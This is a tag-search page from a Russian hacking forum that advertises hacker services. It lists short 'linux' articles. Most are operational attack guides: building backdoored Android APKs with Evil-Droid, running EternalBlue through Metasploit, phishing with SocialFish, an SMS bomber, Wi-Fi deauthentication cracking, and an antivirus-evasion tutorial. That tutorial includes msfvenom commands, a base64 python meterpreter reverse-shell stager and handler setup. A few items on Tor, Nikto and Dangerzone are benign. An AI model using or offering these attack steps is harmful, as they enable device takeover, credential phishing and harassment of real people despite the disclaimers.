Новости и объявления.
- Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
Search the Community
Showing results for tags 'linux'.
-
Приветствую, хакеры! В данной небольшой статье, я хочу рассказать вам о том, как установить Kali Linux на Android без рут прав. Kalimux — скрипт на основе bash, который автоматически устанавливает kali linux в termux без каких-либо проблем и без рута. Этот инструмент работает как на устройстве Android с root-правами, так и на устройстве Android без root-доступа. Установка: $ apt-get update -y $ apt-get upgrade -y $ pkg install python -y $ pkg install python2 -y $ pkg install git -y $ pip install lolcat $ git clone https://github.com/noob-hackers/kalimux $ cd $HOME $ ls $ cd kalimux $ ls $ sh kalimux.sh Запуск: $ ./start-kali.sh Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! Анонимность – это очень хороший способ скрыть себя от всех видов слежки. В этой статье я познакомлю вас с инструментом NIPE, который позволяет сделать Kali Linux анонимным. Многие для улучшения анонимность используют VPN. Бесплатные VPN для этого совершенно непригодны, а платные могут сохранять логи, что может сыграть против вас. В этом плане лучше использовать TOR. Можно использовать Tor в качестве шлюза по умолчанию. Тогда, весь трафик на нашем компьютере будет передаваться через сеть Tor, и отследить нас будет очень сложно. Мы можем сделать это вручную, но ручная настройка отнимет много времени и сил. Куда легче использовать инструменты, которые помогут автоматизируют эту задачу. NIPE — неплохой инструмент для анонимизации всего трафика в Kali Linux. Данный perl-скрипт позволяет направлять весь трафик с компьютера в сеть Tor, через которую можно анонимно пользоваться интернетом, не беспокоясь о том, что нас могут отследить. Установка NIPE на Kali Linux Начнем с клонирования репозитория с GitHub: git clone https://github.com/htrgouvea/nipe Затем переходим в каталог NIPE: cd nipe Теперь установим библиотеки и зависимости: sudo cpan install Try::Tiny Config::Simple JSON Для новичков cpan может показаться странной командой, однако cpan помогает устанавливать пакеты или модули для Perl. После этого мы можем установить Perl-скрипт NIPE: sudo perl nipe.pl install После установки появится сообщение о необходимости перезапуска некоторых служб. Соглашаемся нажав на «TAB» и «OK», затем ENTER. На этом процесс установки завершен. Использование NIPE на Kali Linux Прежде всего, необходимо проверить работу NIPE: sudo perl nipe.pl status NIPE по умолчанию отключен. Запустим его следующей командой: sudo perl nipe.pl start Команды службы NIPE запущены. Снова проверим статус: sudo perl nipe.pl status Теперь необходимо проверить наш IP. Заходим на сайт dnsleaktest, чтобы убедиться, что наш оригинальный IP-адрес скрыт. Если анонимность больше не нужна, тогда можно отключить шлюз Tor: sudo perl nipe.pl stop После применения вышеуказанной команды NIPE перестанет работать. NIPE делает сеть Tor нашим шлюзом по умолчанию. Таким образом, мы можем анонимизировать всю систему Kali Linux. Взломать Tor практически невозможно, но, как мы знаем, теоретически возможно все. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Приветствую, хакеры! В данной статье я хочу рассказать вам о том, как взломать Wi-Fi при помощи Kali Linux. Для начала взлома вам понадобится сетевой Wi-Fi адаптер, который имеет поддержку режима мониторинга, совместимый с Kali Linux. Wifite2 установлен в Kali Linux по умолчанию. Лучше всего использовать данный дистрибутив на виртуальной машине или же прямо на компьютере, который имеет обновление загрузочной записи и возможность выбора операционной системы. По сути, Wifite2 можно установить в любом другом дистрибутиве, но лучше всего он будет работать если у вас Kali Linux, так как он является наиболее распространенным. При условии, что Wifite2 не установлен в вашей системе, вы можете скачать эту утилиту из репозитория на GitHub. Погнали! 1. Для того, чтобы установить Wifite2, в терминале введите команды, показанные ниже, для клонирования репозитория и запуска инсталляции: git clone https://github.com/derv82/wifite2.git cd wifite2 ls sudo python setup.py install 2. Для запуска используем следующую команду: ./Wifite.py Для того, чтобы получить подробную информацию по использованию введите команду wifite -h Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
В этой статье вы узнаете как перенаправить весь трафик на linux через tor. Итак, есть два варианта юзать сеть ТОR в качестве прокси, перед этим надо установить TOR. 1. Proxychains Proxychains - это утилита, позволяющая перенаправлять TCP траффик через множество прокси-серверов, образуя цепочку. Данная программа по умолчанию встроена в Kali Linux. Благодаря данному способу можно пропускать траффик только той программы, которую мы укажем в консоли. Настроим Proxychains: leafpad etc/proxychains.conf И прописываем в конце файла следующие строки: Строки: socks4 127.0.0.1 9050 (в моем случае эта строка уже стояла) socks5 127.0.0.1 9050 А в начале документа необходимо указать одну из следующих опций: #dynamic_chain (соединение будет осуществляться через определённые цепочки прокси)#strict_chain (трафик проходит постепенно через всю цепь прокси, и если один из прокси окажется нерабочим, может не работать всё соединение)#random_chain (каждый раз происходит подключение через разные цепочки прокси) Сохраняем документ. Теперь вводим в консоли следующие команды: tor Proxychains [программа, которую необходимо запустить через TOR] 2. Privoxy Как гласит Википедия, Privoxy - это свободный веб-прокси с расширенными возможностями фильтрования интернет-контента для защиты конфиденциальности (приватности) пользователей сети Интернет. Privoxy, в отличие от Proxychains, перенаправляет весь трафик через сеть TOR. Итак, устанавливаем Privoxy: apt-get install privoxy И настраиваем: leafpad etc/privoxy/config В самом конце прописываем следующие строки: forward-socks5 / localhost:9050 . forward-socks4 / localhost:9050 . forward-socks4a / localhost:9050 . После чего сохраняем файл и переходим к настройкам менеджера подключений. Заходим в Настройки — Сеть — Сетевая прокси служба. Выбираем метод ручной. Bбиваем в Http и Https - localhost порт — 8118. В узел Socks - localhost порт — 9050. На этом настройки завершены (убедитесь, что вид прокси установлен вручную). Осталось запустить сервисы следующими командами: service tor start service privoxy start Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Привет, хакеры, в этой статье поговорим о взломе андроид смартфонов. Сегодня многие думают о том, чтобы взломать смартфон, удалённо прослушивать разговоры, просматривать смс-ки и самое интересное – смотреть через вебку. Взлом игр, приложений на андроид был доступен уже очень давно, чуть ли не с первых версий. Точнее сказать, тогда это было возможно, но не так популярно. Начнём с того, что андроид является ОС на базе ядра Linux, а это много чего означает. Все возможности, которые у вас есть на десктопной версии, есть и на андроид смартфонах. Тут дело в удобстве. Мы уже публиковали статью, где рассказали о самых популярных приложениях для взлома и тестирования безопасности на андроид. Взлом андроид смартфона не сложнее чем взлом операционной системы, будь-то Linux или Windows. Всегда можно загрузить вредоносное приложение, через которое мы откроем бэкдор и сможем войти в систему удалённо. Есть также возможность прослушивать телефон через открытые порты. Таким вариантом мы сегодня и воспользуемся. Давайте разберемся, что нам для этого понадобится: Скрипт Evil-Droid; Открытый порт; ПК с установленным Kali Linux или загрузочная флешка. Взлом андроид смартфонов – установка и запуск компонентов Скачиваем архив или копируем его через терминал в необходимое место. git clone https://github.com/M4sc3r4n0/Evil-Droid.git Далее переходим в папку и даём права на исполнение файлу evil-droid chmod +x evil-droid Запускаем скрипт и генерируем вредоносный apk с бэкдором sh evil-droid Генерировать можно как файл под номером 2, так и 3. Я пользуюсь третьим, версия подойдёт для андроид устройств с более хорошей безопасностью. Для смартфонов с версией андроид 3-5 подойдёт и 2 пункт. Перед нами появилось меню для настройки apk, которым мы будем пользоваться для взлома андроид. Пункты, которые нам нужно настроить: ip-адрес – на выбор локальный и глобальный, используйте глобальный, если атакуемый смартфон будет не у вас в локальной сети. set lport – установка порта, тут вы можете выбрать любой, главное чтобы он был открыт. Иначе прослушать смартфон не получится. Как просканировать порты в вашей сети – читать. Метод прослушки – я рекомендую использовать android/meterpreter/reverse_tcp, так как мы будем использовать metasploit для управления. Выбор папки, куда будет сгенерирован вредоносный apk. Генерация вредоносного apk. Всё сделано. Для того чтобы произошел взлом андроид смартфона и вы могли им управлять, необходимо установить evilapk на атакуемый смартфон. Тут методов много и придётся использовать СИ. Далее мы запускаем скрипт ещё раз и выбираем пункт – start listening. Зараженный смартфон появиться в списке, и в открытом окне появится возможность ввести команды управления. Для того, чтобы получить их список, воспользуйтесь параметром –help или -h(идентичны). Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Привет, хакеры! Было уже множество статей на тему создания смс-бомберов. Однако, сейчас вы узнаете, как использовать самый сильный бомбер из все, что сейчас можно найти обычному человеку. Процесс займет не больше 5 минут. Первым делом необходимо установить Termux (Его можно найти прямо в Play Market). После установки запускаем приложение: Теперь поочередно вводим каждую команду (после каждой введенной команды нажимайте Enter) pkg update pkg upgrade pkg install git git clone https://github.com/FSystem88/spymer pkg install python cd spymer python spammer.py Введя все команды увидим это: В распоряжении множество пунктов: СМС спамер Добавление своего номера в черный список (Другие люди не смогут спамить на ваш номер) Проверить номер в черном списке Спамер звонком (Телефон добавляется под отрицательными отзывами различных компаний, где написана просьба перезвонить и уточнить) Прокси-сервер с которого будет идти спам-атака Обновить спамер Выйти Чтобы начать работу выбираем первый пункт, нажимая цифру 1. Вводим номер телефона без знака “+”. Пишем любое количество кругов, рекомендую 50. Поздравляю, спамер работает! Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
-
Привет, хакеры, программа берет потенциально опасные PDF-файлы, офисные документы или изображения и конвертирует их в безопасный PDF-файл. Dangerzone работает следующим образом: вы даете ему документ, в котором не уверенны, можете ли вы ему доверять (например, вложение электронной почты). Внутри песочницы dangerzone преобразует документ в PDF (если он еще не создан), а затем преобразует PDF в необработанные пиксельные данные: список значений цвета RGB для каждой страницы. Затем в отдельной песочнице dangerzone берет эти данные пикселей и преобразует их обратно в PDF. Скачать 0.1 для Mac Скачать 0.1 для Windows См. Установку в вики для репозиториев Linux Некоторые особенности Песочницы не имеют доступа к сети, поэтому, если вредоносный документ может скомпрометировать ее, он не сможет отзвонить домой Опционально Dangerzone может распознавать создаваемые безопасные PDF-файлы, поэтому в нем снова будет текст. Dangerzone сжимает безопасный PDF для уменьшения размера файла После конвертирования софт позволяет открывать безопасный PDF-файл в программе просмотра PDF по вашему выбору, что позволяет открывать PDF-файлы и офисные документы в dangerzone по умолчанию, чтобы вы случайно не открыли опасный документ. Dangerzone может конвертировать эти типы документов в безопасные PDF-файлы: PDF ( .pdf) Microsoft Word ( .docx, .doc) Microsoft Excel ( .xlsx, .xls) Microsoft PowerPoint ( .pptx, .ppt) ODF Text ( .odt) ODF Spreadsheet ( .ods) Презентация ODF ( .odp) ODF Графика ( .odg) JPEG ( .jpg, .jpeg) GIF ( .gif) PNG ( .png) TIFF ( .tif, .tiff) Dangerzone был вдохновлен PDF Qubes , но работает в операционных системах, отличных от Qubes. Он использует контейнеры как песочницы вместо виртуальных машин (используя Docker для macOS, Windows и Debian / Ubuntu и podman для Fedora). Установка Debian / Ubuntu Установите зависимости: sudo apt install -y python-all dh-python python3-stdeb docker.io python3 python3-pyqt5 python3-appdirs python3-click python3-xdg python3-requests Запустите из source tree: ./dev_script/dangerzone Создайте .deb: ./install/linux/build_deb.py Установка в других системах (настройка антивируса, компиляция exe):firstlookmedia/dangerzone
-
- danferzone
- взлом
- (and 13 more)
-
Сегодня мы будем работать с таким сканером веб-серверов как Nikto. У меня Parrot OS со встроенным Nikto, но вам придётся скачивать, если у вас обычный Линукс. С помощью него вы способны проверить сервера на ошибки, неверные настройки, дефолтные файлы и на уязвимости. Скажу сразу, что Nikto не создавался быть незаметным и его активность останется в логах сервера и попадёт в поле зрения IPS/IDS(система обнаружения и предотвращения вторжений). Советую работать через прокси. Обновляем пакеты ОС и клонируем репозиторий с GitHub'а: sudo apt update git clone https://github.com/sullo/nikto.git Всегда перед использованием обновляйте Nikto: nikto -ubdate nikto -update Тут нам представили некоторые аргументы к командам. Сегодня мы их тоже разберём. Плюс(+) значит требуется значение. То же самое вы увидите в результате аргумента "-h"(-help) И так, заходим в директорию и введём первые команды: cd nikto nikto -host www.CyberCat.uz Тут нам нужно указать хост сайта(IP или домен). Если вы хотите указать свой порт, то добавляете его "-p"(-port): nikto -host www.CyberCat.uz -p 443 Если вы вводите IP адрес, то порт можно указать так: 111.111.11.11:443 Или перечислением: nikto -host www.CyberCat.uz -p 88,443,80 также можно указать диапазон: - p 80-90 Вы можете ещё указать несколько хостов для сканирования на одну сессию nikto. Для этого вам нужно создать текстовой файл с прописанными хостами внутри и вызвать его в команде с указанием полного пути. Хосты должны быть перечислены на каждой строке. Чтобы сохранить отчёт о сканировании, нужно под аргументом "-o"(-output) указать куда кидать отчёт и выбрать формат под аргументом "-Format": nikto -host www.CyberCat.uz -o ~/CyberCatTest.html -Format htm Форматы могут быть следующие: html, csv, txt, sql, nbe, xml. Если формат не указан, то он будет взят из расширения файла с аргументом "-о" Nikto сначала начинает скан через HTTP и если он замечает SSL сертификат,он переходит на HTTPS. Если вы точно знаете что сайт имеет SSL, вы можете сразу начать скан через HTTPS с помощью аргумента "-ssl", дабы сохранить время. А аргумент "-nossl" отключает использование ssl Аргумент "-Tuning+": 1 Интересные файлы/Увиденные в логах 2 Неправильно настроенные/Дефолтные файлы 3 Раскрытие информации 4 Инъекция (XSS/Script/HTML) 5 Удалённое извлечение файлов — Внутри корня веб 6 Отказ в обслуживании 7 Удалённое извлечение файлов — По всему серверу 8 Выполнение команд/Удалённый шелл 9 SQL-инъекция 0 Выгрузка файлов a Обход аутентификации b Идентификация программного обеспечения c Удалённое внедрение кода d Веб-служба e Административная консоль x Обратное значение опций настройки т. е. включить всё, кроме указанного) Один из примеров вывода со значением Tuning. Тут я проверил наличие уязвимостей на инъекции (XSS/Script/HTML) По дефолту запросы отправляются каждые 10 секунд, а с аргументом "-timeout+" вы сможете сами обозначить тот самый таймаут. Как я сказал в начале, активность вашего скана будет замечена в логах,поэтому вам лучше использовать прокси. Это может быть любой ваш прокси или что-то, что обеспечивает вам какую-то анонимность. Также вы можете работать через прокси прямо в консоли введя аргумент "-useproxy" и Аргумент "-Display+" позволяет включить или отключить отображение вывода: 1 Показать редиректы 2 Показать полученные кукиз 3 Показать все ответы 200/OK 4 Показать URL, которые требуют аутентификацию D Отладочный вывод E Отобразить все HTTP ошибки P Печатать прогресс в STDOUT (стандартный вывод) S Собрать из вывода IP и имена хостов V Вербальный вывод Также, если вы добавите аргумент "-dbcheck", то база данных проверится на ошибки синтаксиса. "-404code" позволяет игнорировать HTTP коды. Формат: 302,301Аргумент "-id+" позволяет использовать аутентификацию на хосте, формат id:pass или id:pass:realm "-mutate+" Предположить дополнительные имена файлов: 1 Проверить все файлы по всем корневым директориям 2 Предположить имена файлов с паролями 3 Перечислить имена пользователей через Apache (запросы вида /~user) 4 Перечислить имена пользователя через cgiwrap (запросы типа /cgi-bin/cgiwrap/~user) 5 Попытаться брут-форсить имена субдоменов, предположить, что имя хоста является родительским доменом 6 Попытаться угадать имена директорий из вашего словаря Я никого ни к чему не призываю, статья написана в ознакомительных целях!
-
Привет, хакеры, во множестве статей используется Termux, поэтому решено, необходимо рассказать, что нужно для дальнейшей работы, давайте настроим Termux. Termux —терминала на андроид. С помощью которого устанавливается и производится работа с некоторыми утилитами. Также установив какую-нибудь ОС на виртуалку,вы сможете пользоваться её терминалом прямо в Termux. Теперь понимаете насколько это удобно? Первым делом скачиваем Termux с Play Market. Чтобы понять как туда попасть, придётся загуглить(будет сложно, не сдавайтесь). В процессе установки загрузка может приостановиться и попросить вас ввести Да или Нет (y/n). Вы всегда вводите y, чтобы разрешить продолжить. Заходим и пишем по очередно: apt upgrade Сейчас мы обновили установленые пакеты. apt install git apt install python && python2 apt install nano apt install unzip nano — текстовой редактор python нам нужен, чтобы в будущем устанавливать и запускать утилиты на python. unzip позволяет открывать zip архивы в терминале. apt install bash bash нам понадобится для запусков файлов .sh apt install pip pip нам понадобится для установки инструментов через pip Я никого ни к чему не призываю, статья написана в ознакомительных целях!
-
- установка termux
- настройка termux
- (and 9 more)
-
Привет, хакеры, в данной статье расскажу о способе взлома компьюетра, позволяющий управлять камерой, перезагрузкой и всеми другими компонентами ПК. Установка Termux Способ будет показан через телефон, поэтому необходимо скачать и установить Termux из плей маркета. Устанавливаем все необходимые библиотеки: pkg update pkg install wget Следующим этапом загружаем Metasploit git clone https://github.com/gushmazuko/metasploit_in_termux.git Далее клонируем его и производим запуск cd metasploit_in_termux chmod +x metasploit.sh ./metaslploit.sh Ожидаем установки. После завершения загрузки, будет необходимо ввести букву Y, что будет означать – да. Если у вас достаточно хороший телефон, то проблем с установкой не возникнет. Взлом компьютера Атака на компьютер производится при помощи известного и популярного эксплойта EternalBlue. Однако, необходимо сначала получить собственный ип-адрес. Для этого переходим в термукс и вводим следующую команду: ip addr show Видим всю необходимую информацию для продолжения. После получения собственного ип-адреса, необходимо запустить консоль данной командой: $ msfconsole После ввода видим подобную картину: Когда консоль откроется, можно начать выбор необходимого эксплойта. Прописываем данную команду: use exploit/windows/smb/ms17_010_eternalblue Отлично, эксплойт выбран. Задаем ип-адрес нашей жертвы и прописываем команду: set RHOST IP Далее создаем payload set payload windows/meterpreter/reverse_tcp После задаем собственный ип-адрес, который узнали ранее. set LHOST IP Вводим следующую команду: set LPORT 4444 Отлично, теперь вы получили консоль, которая позволит управлять другим компьютером.
-
О, брат, ты снова зашёл на мою статью? Окей, значит ты зашёл именно туда, куда нужно. Сейчас я хочу познакомить с фишинговым инструментом SocialFish. Он позволяет легко создавать фейк-страницы самых популярных веб-сайтов, таких как Instagram, Twitter, Github и т.д. Установка Клонируй это из Github в Termux. git clone https://github.com/An0nUD4Y/SocialFish.git Перейди в папку SocialFish, установите требования, измените режим файла python и выполните: cd SocialFish apt install python3-pip // Если не установлено pip3 install -r requirements.txt // Если не установлено chmod 777 SocialFish.py ./SocialFish.py Возможно, у вас появится вот такая ошибка. Если она у вас появилась, то делаем следующее: pkg up pkg install curl pkg install php Соглашаемся и продолжаем: После установки мы запускаем SocialFish заново и соглашаемся: После того, как вы ответите на вопросы, вы увидите доступные варианты страниц: FACEBOOK PHISHINGИНСТАГРАМ ФИШИНГСНАПЧАТ ФИШИНГYAHOO PHISHINGДВИЖЕНИЕ ФИШИНГАMICROSOFT PHISHINGПАРНЫЙ ФИШИНГВК ФИШИНГICLOUD ФИШИНГ Можете использовать любой. Ничего сложно в этом нет. Предупреждаю, что данная статья предназначена лишь для ознакомления и не призывает к действиям.
-
Привет, хакеры, продолжаем тему узнавания паролей от беспроводных сетей. В данной статье будет рассказано про способы получения подобной информации на Linux. Как узнать пароль от WiFi на Linux Для подключения к беспроводной сети в Linux Используется либо Network Manager либо WPA Supplicant. Первое является программой с собственным граф. Интерфейсом, а второе подключает компьютер к беспроводной сети, используя стандартную консоль. Оба инструмента сохраняет все настройки в открытую. Однако перед освоением команд, необходимо воспользоваться граф. Интерфейсом, необходимо это для получения информации об подключениях компьютера к различным сетям. Нажимаем на значок беспроводной сети возле часов и тыкаем “Сетевые соединения”. Отлично, видно сети к которым компьютер подключался и подключен прямо сейчас. Для получения пароля берем одну из сетей и нажимаем на ней “Изменить”. После нажимаем на вкладку “Защита Wi-Fi”, где отмечаем пункт “Показывать пароль” Для выполнения данной функции не требуется пароль администратора, то есть выполняется любым пользователем. Ранее оговаривалось, что программа сохраняет все данные в открытом виде: В папке /etc/NetworkManager/system-connections/. Просмотреть файлы ls -l /etc/NetworkManager/system-connections/ Для просмотра названий и паролей вводим: sudo egrep -h -s -A 9 --color -T 'ssid=' /etc/NetworkManager/system-connections/* Вторая программа, использующая командную строку, для проверки подключений хранит всю свою информацию по адресу - /etc/wpa_supplicant.conf. Однако запустить программу можно и при помощи ключа, который указан после файла с неизвестным названием и положением. В случае автоматический загрузки данной программы, есть возможность изучения файла - /etc/rc.local на наличие команды, которая поможет в поиски настроек беспроводной сети. Данный файл можно найти, взглянув на статус службы: systemctl status wpa_supplicant.service В случае ручного запуска программы, поиск осуществляется в данных категориях: grep supplicant ~/.bash_history Просмотр содержимого папки программы: ls -l /etc/wpa_supplicant/ Код для вывода содержимого файла: cat /etc/wpa_supplicant/wpa_supplicant.conf
-
Часто люди задаются вопросом, а почему Линукс практически неуязвим к вирусам, почему хакеры сидят именно на нем? Каким образом оно не взламывается? Существует несколько пунктов, которые подтверждают этот факт, в данной статей будет написано 7 таких причин. 1. Популярность ОС Windows для персональных компьютеров гораздо выше, чем на серверах, где используется Linux. 2. Всю работу на линуксе пользователь изначально выполняет под пользователем, не имеющим привилегий. Рут доступ к изменению файлов системы выполняется только самой операционкой. Обычный человек имеется право только для чтения системных файлов, это позволят иметь хорошую защиту от вирусов, вредоносные программы не могут изменять внутренние файлы. 3. Операционка имеет другую подсистему прав, в отличии от виндовс не имеется реестра, настройки программ сохранятся по адресу /etc, обычный юзер владеет только правами чтения. В Windows для работы большого количества приложений требуется доступ к записи системных файлов. Это означает, что вирус не сможет изменить никаких строк в компьютерной системе. 4. Допустим если человек запустил вирус, удаляющий данные с компьютера, то самой серьезной бедой будет удаление информации домашнего каталога. Удаление системы произойти не может. Пользователь может запустить вредоносную программу, запускающую сервис, подключающий юзера к определенному хосту для извлечения важных данных. Перезагрузив устройство вредоносный код не запустится автоматически. Отсутствует возможность изменения скриптов внутренней части, чем часто пользуются малвари. 5. Люди владеющие Unix-подобными системами очень компетентны, значит они намного лучше производят контроль. 6. Линукс имеет мощнейший Firewall являющийся компонентом ОС. Произведя хорошую настройку можно добиться существенного повышения безопасности. 7. Программы никогда не запускаются самостоятельно, важнейшая часть безопасности подобных операционок.
-
Всем привет, сейчас расскажу об отличном инструменте, который поможет вам во взломе WiFi – wifite. Это крайне маленький гайд, все предельно просто и ясно даже новичку. Данную утилиту можно найти по стандарту в кали линукс, поэтому спокойно этот способ подойдет даже для телефонов. Вся информация лишь для ознакомления и возможного создания безопасной оболочки от взломов. Способ взлома весьма стандартный, перехват хеша и деаутентификация. Главный плюс инструмента, то что всю работу он берет на себя и автоматизирует процесс ввода команд. Начнем 1. Запускаем кали 2. Открываем консоль и устанавливаем пользовательскую версию программы, так как стандартная уже не обновляется. 3. Когда будет установлена, пишем – cd wifite2 и заходим в корень к инструменту 4. Чтобы запустить: ./Wifite.py Наша карта теперь автоматом перевелась в режим мониторинга, моментально сканируются ближайшие сети, ожидаем обнаружения нужной. 5. Выбираем сеть, которую собираемся подвергнуть атаке. 6. Клацаем ctrl+c прописываем номер сети или несколько номеров. 7. Начинается деаутентификация и перехват хэндшейков, ожидаем некоторое время. После перехвата мы увидим уведомление, если выбрано несколько сетей, процесс повторяется для каждой сети. 8. Полученный хеш мы можем расшифровывать любым доступным способом.
-
Всем привет. Сегодня рассмотрим вариант запуска meterpreter сессии на машине Windows 10 с самыми свежими патчами (включая Windows Defender). И все также будем обходить антивирусы. Meterpreter — расширенная многофункциональная начинка (payload, нагрузка), которая может быть динамически расширена во время выполнения. В нормальных условиях это обеспечивает вас основной оболочкой и позволяет вам добавлять новые особенности к ней по мере необходимости. Будем мы это делать с помощью Python, и посмотрим, как поведут себя антивирусные средства. Предугадывая вопрос «А нужен ли нам Python на машине жертвы для запуска ехе?», отвечу сразу – нет, не нужен, все уже внутри. В данной статье мы будем использовать: Windows 10 с включенным Windows Defender с обновленными базами (компьютер жертвы 192.168.1.113);Kali linux для использования metasploit и msfvenom (192.168.1.126); Windows 10 для сборки бинарника (в нашей лаборатории совпадает с компьютером жертвы) с установленными; Python (3, но и для 2 тоже посмотрим);py2exe.Для начала обозначим проблему: создадим exe файл со стандартной нагрузкой, скопируем на машину жертвы и посмотрим к чему это приведёт. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.126 LPORT=9001 -f exe > hunt.exe Мы получаем предупреждение от нашего старого друга Windows Defender, которого мы так все любим. Давайте запустим Python и сделаем то, ради чего мы все тут собрались. Python/meterpreter/reverse_tcp – это уникальный кроссплатформенный payload Metasploit Framework, который позволяет удаленно управлять скомпрометированным компьютером. Не нужно думать о том, какую платформу выбрать, он сработает на любой, но в данном случае сделаем из него исполняемый файл под Windows. Для начала установим пакет py2exe, который позволяет сделать исполняемый файл Windows из Python скрипта. У нас это будет Python 3.4 (все что выше – не поддерживает py2exe). py -3.4 –m pip install py2exe или pip install py2exe Далее создадим «сырой» питоновский код с расширением .py msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.126 LPORT=9001 -f raw > hunt.py Так же в вывод msfvenom нам необходимо добавить импорт getpass, который он забывает сделать сам. В итоге получиться должно так: import getpass,base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4xMjYnLDkwMDEpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK'))) Теперь у нас все готово для создания бинарника. python34 -m py2exe.build_exe hunt.py --bundle-files 0 Уже лучше, теперь проверим это в действии – после копирования на машину жертвы обходимся без алертов. Параллельно запустим наш msf и handler для питона, запустив последовательно команды: msfconsole use exploit/multi/handler set PAYLOAD python/meterpreter/reverse_tcp set lhost 192.168.1.126 set lport 9001 run Пойдем дальше и убедимся, что сессия работает корректно. Таким образом сессия запущена и Windows Defender не сработал, чего мы и добивались. Заодно давайте рассмотрим, что делать, если у вас Python 2ой версии. Качаем py2exe для python 2 Генерируем payload с расширением .py Создаем файл setup.py и пишем туда следующее: from distutils.core import setup import py2exe setup( name = ‘Meter’, description = ‘Python-based App’, version = ‘1.0’, console=[‘hunt.py’], options = {‘py2exe’: {‘bundle_files’: 1,’packages’:’ctypes’,’includes’: ‘base64,sys,socket,struct,time,code,platform,getpass,shutil’,}}, zipfile = None, ) python.exe .\setup.py py2exeДолжно получиться все то же самое. В качестве итога замечу, что оболочка python meterpreter уступает по функционалу более привычному windows meterpreter. Например, не получится мигрировать в процесс или использовать команды типа getsystem, но все же это реальная альтернатива: получить сессию для работы с msf (routing и portfwd как минимум) и далее работать внутри сети.
-
- windows
- windows defender
- (and 12 more)
-
Здарова всем, сейчас расскажу и покажу как создать свой onion сайт в сети TOR, располагаться который будет прямо на установленной Kali Linux, никаких хостингов! Но, он будет работать только тогда, когда вы его запустите. Если вы хотите иметь красивый адрес вашего сайта, то начинаем сразу с первого пункта, если это вас не интересует – со второго. Пункт 1 Для работы нам нужна именно старая версия Кали. Для примера я буду использовать 1.0.6 На дальнейших версиях не работала. Найти можно в различных архивах. Нарезаем на болванке или же создаем live usb. Загружаем систему. Ждем подключения сети. После чего за работу возьмется Shallot. Shallot даст вам возможность создавать адреса .onion с определенными настройками. Косок адрес может быть случайным. Для установки делаем следующее. Скачаем Shallot с github Код: wget https://github.com/katmagic/Shallot/archive/master.zip Переходим в директорию Код: cd Shallot-master Дальше Код: ./configure make Производим запуск для примера Код: ./shallot ^name ------------------------------------------------------------------ Found matching domain after 30493976 tries: penistfobso4wxhr.onion ------------------------------------------------------------------ -----BEGIN RSA PRIVATE KEY----- MIICXgIBAAKBgQC+dO6h1GjQD0Hqn2LLBX0kIA9px/CtxV5yxMCjbk773igLvXDu v7N9Kr1FYB+yKuSWL/aCZttLqiqUA4L3cxI5Dgtk3bRKkmZre9qfH9xU9v+RSr5P BQmtp0AMi2wLiZxGggkoqcdIhKC4WWoD1xks0H//f7D+G+rdh4IMOHj7kQIEAPC0 RQKBgAwEVw9kxxu/SIugn3dDXJ2tq8V/uGNMBm02MnhckgvIS6S9wfB60mjy3FG/ SUPCWE/f5pUx8fNb3aPnIg2C5FlSE8hAfzdVBIP5F3S2KacSeCL+DPgCpcM8Tkfh s5AaqHe5Z+cb2pLE/1VXQpnnSQhLuSQFresIMCxnaBjOizzJAkEA4laycqQo2Guu eGkppcdNDRnlI4+bCslp2C4ZOuv8/DaLsQ/UE+RMrhdmJi48bcGBafcQlfewdyvL FpF6cpzjtQJBANdqdFilmRwCi1Ij4Q3dBubjjo5+WzxeZ0A6M6g5HDPFZBuHoXtI LNbSz5ilriQQ8fhKZi1HpwVWhNNLyIB3me0CQCdn1d98SwNP+gIfyvYT5ufxoBfH ElngrkQr4rYhsbCmSorxfen9gxI1hQVy4DsbTfttzSwJmOZ5P/CBG+HPFjUCQQCB gWh+P0wOCUDfkRDXdVd1Tb/7nbPbk8r+VlVgnz7fMNPYzjVkq2DTsRvk8uWTdMwQ bTDrrSiO0Wv5zxmMocT9AkEAkLfNSgZafRVmipGo9Fn78ZqedvZAqfYkwXgoIfrB MEq+FK1D3nyY9QDukbe6uR7k8gTfqTtqiHwIQ5JX7u6v7w== -----END RSA PRIVATE KEY----- Строку “name” заменяется на любое имя, которое захотите. Не забывайте, что чем длиннее слово, тем больше времени понадобится для генерации. Лучше всего не больше 6 символов. Полученные данные нужно сохранить в текстовый документ и сохранить на внешнем носителе. Пункт 2 В терминале вводим по порядку: Код: apt-get install tor apt-get install lighttpd Потом запускаем tor и lighttpd Код: service tor start service lighttpd start Необходимо чтобы они сделали конфигурации, для этого в etc, tor, torrc расскоментируем и привидем к такому виду строчки: Код: HiddenServiceDir /var/lib/tor/hidden_service/ HiddenServicePort 80 127.0.0.1:8080 А ниже впишем вот это: Код: ExcludeNodes {ru}, {ua}, {be} В /var/lib/tor/hidden_service имеется два файла hostname и private_key В первом 